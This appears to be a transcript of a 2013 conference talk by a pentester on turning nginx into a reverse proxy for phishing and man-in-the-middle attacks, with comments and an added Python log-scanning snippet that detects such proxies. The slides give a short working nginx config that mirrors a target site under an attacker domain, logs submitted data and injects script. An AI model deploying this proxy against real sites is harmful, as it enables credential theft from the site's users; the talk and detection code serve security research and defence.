Sergey Belov

• Pentester in Digital Security / ERPScan;
• Writer (habrahabr.ru, “Xakep”);
• CTF Player;
• Bug bounty member (Google, Yandex);
• bugscollector.com creator.

• Very easy
• 0$
• Not mentioned in the wild
NGinx – reverse proxy

[Diagram: Client -> Nginx -> Apache / php-fpm]

[Diagram: Client -> attacker.com (Nginx) -> vuln.com (Nginx / Apache / php-fpm / ??? http server)]

Step 1

    # outer server block assumed; the slide shows only its closing brace
    server {
        location / {
            proxy_pass http://vuln.com;
            proxy_set_header X-Real-IP $remote_addr;
        }
    }

Step 2 (inside the same location block)

    proxy_set_header Host "vuln.com";
    sub_filter 'vuln.com' 'attacker.com';
    sub_filter_once off;
Phishing

NGinx – tool for MitM/phishing?

+ Identical design
+ Fully functional
+ Logging all data (POST/GET)
+ Add custom JS/HTML
- Another domain (DNS poisoning / router hacking, malware, evil APN config, etc.)
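From the origin side, the Step 1 config leaves a footprint: every request reaches vuln.com from the proxy's own address, carrying an X-Real-IP header that the proxy added. As an added example (not from the talk), this Python snippet scans a constructed origin log in an assumed format for peers that set X-Real-IP without being one of our own trusted proxies:

```python
import re
from collections import defaultdict

# Constructed sample origin-server log lines. Assumed log format (not the
# talk's): '$remote_addr "$http_host" "$http_x_real_ip" "$request"'.
# 203.0.113.7 plays the role of attacker.com's nginx: one TCP peer that
# forwards many different victims and stamps each one into X-Real-IP.
SAMPLE_LOG = """\
203.0.113.7 "vuln.com" "198.51.100.10" "POST /login HTTP/1.1"
203.0.113.7 "vuln.com" "198.51.100.11" "GET / HTTP/1.1"
203.0.113.7 "vuln.com" "198.51.100.12" "GET /profile HTTP/1.1"
10.0.0.5 "vuln.com" "192.0.2.44" "GET / HTTP/1.1"
192.0.2.9 "vuln.com" "" "GET /index.php HTTP/1.1"
"""

# Proxies we operate ourselves (load balancer, CDN edge); assumed value.
TRUSTED_PROXIES = {"10.0.0.5"}

LINE_RE = re.compile(r'^(\S+) "([^"]*)" "([^"]*)" "([^"]*)"$')


def parse_line(line):
    """Split one log line into peer, Host, X-Real-IP and request line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    peer, host, real_ip, request = m.groups()
    return {"peer": peer, "host": host, "real_ip": real_ip, "request": request}


def find_untrusted_proxies(log_text, trusted=TRUSTED_PROXIES):
    """Map each peer that sets X-Real-IP without being a trusted proxy to the
    sorted distinct client addresses it claimed. A browser talking to us
    directly does not normally send X-Real-IP, and one peer speaking for many
    clients is the footprint of proxy_set_header X-Real-IP $remote_addr."""
    claimed = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["real_ip"] or rec["peer"] in trusted:
            continue
        claimed[rec["peer"]].add(rec["real_ip"])
    return {peer: sorted(ips) for peer, ips in claimed.items()}


if __name__ == "__main__":
    for peer, ips in find_untrusted_proxies(SAMPLE_LOG).items():
        print(f"{peer} forwards {len(ips)} distinct clients: {', '.join(ips)}")
```

The same idea works with X-Forwarded-For if the origin logs that header instead; the signal is the untrusted peer, not the header name.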
Pentest

• Random exploits?
• Change response data (rights of social network apps)
• Change apps swf -> java (exploit)
• ???
DNS rebinding

- Another domain
- Very unstable
+ Can attack internal resources

Internal, not external!

C:\Users\BeLove>ping www.ya.ru
Обмен пакетами с ya.ru [87.250.250.203] с 32 байтами данных

Remove it from:
• Pentester’s reports
• Most famous security scanners

Thanks!
demo: http://zn.sergeybelove.ru
http://twitter.com/sergeybelove
Nginx warhead

ZeroNights 2013 talk about nginx

Published in: Technology

Comments
  • P.S. I am talking about the server’s headers. Your MitM will stick out like a Rastaman in front of the Mausoleum on Red Square.
  • sergeybelove then you might as well use dnat, string and mangle
  • This was not about a threat but about a trick: enough of the PHP fakes with a ripped design and a shameful redirect after the login/password is entered, when you can fully proxy the resource once the user has already opened our link.
    And the second point: stop writing about DNS rebinding in scanner / pentester reports for sites with an external IP.

    P.S. Which headers are you talking about? We _fully_ emulate a legitimate user; all the headers match. As mentioned, the example is zn.sergeybelove.ru
  • @alexanderlyamin I didn’t get it either
  • headers will be altered == easily detectable == what’s the point?
